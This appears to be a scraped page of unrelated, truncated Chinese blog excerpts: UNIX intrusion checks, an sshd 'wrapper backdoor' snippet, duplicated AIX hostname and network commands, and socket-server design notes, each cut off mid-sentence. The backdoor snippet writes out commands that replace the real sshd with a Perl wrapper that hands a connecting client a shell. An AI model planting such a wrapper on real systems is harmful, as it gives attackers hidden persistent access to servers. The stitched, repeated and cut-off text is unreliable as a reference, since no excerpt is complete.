预备知识 因为UNIX和类UNIX系统经常承当着关键任务,所以它经常是入侵者攻击的首选目标。于是检测入侵、保护系统安全是管理员的最为重要的任务之一。那么,在没有其它工具帮助的情况下,如何去判断系统当前的安全性?如何去发现入侵呢?下面给大家介绍一些常用到的检查
wrapper后门实践 先部署后门 cd /usr/sbin/ mv sshd ../bin/ echo '#!/usr/bin/perl' >sshd echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARG
hostname 显示主机名hostname 主机名 修改主机名(设备重启实效)chdev -l inet0 -a hostname=主机名 永久修改主机名(重启不生效) arp -a 查看内存中的ARP地址映射表 lsdev -Cc adapter 列出系统中已安装的网络适配器lsdev -Cc if 列出系统中已配置的网络接口lsattr -El 网卡名 显
hostname 显示主机名hostname 主机名 修改主机名(设备重启实效)chdev -l inet0 -a hostname=主机名 永久修改主机名(重启不生效) arp -a 查看内存中的ARP地址映射表 lsdev -Cc adapter 列出系统中已安装的网络适配器lsdev -Cc if 列出系统中已配置的网络接口lsattr -El 网卡名 显
SOCKET:服务器设计 1.1 迭代服务器和并发服务器 迭代服务器:该服务器每次只能处理一个客户端,只有当完全处理完一个客户端之后,才能处理下一个客户端 并发服务器:该类型的服务器可以同时处理多个客服端的请求,传统的并发服务器是在父进程当中,为一个新的客户端请求开辟一个新的进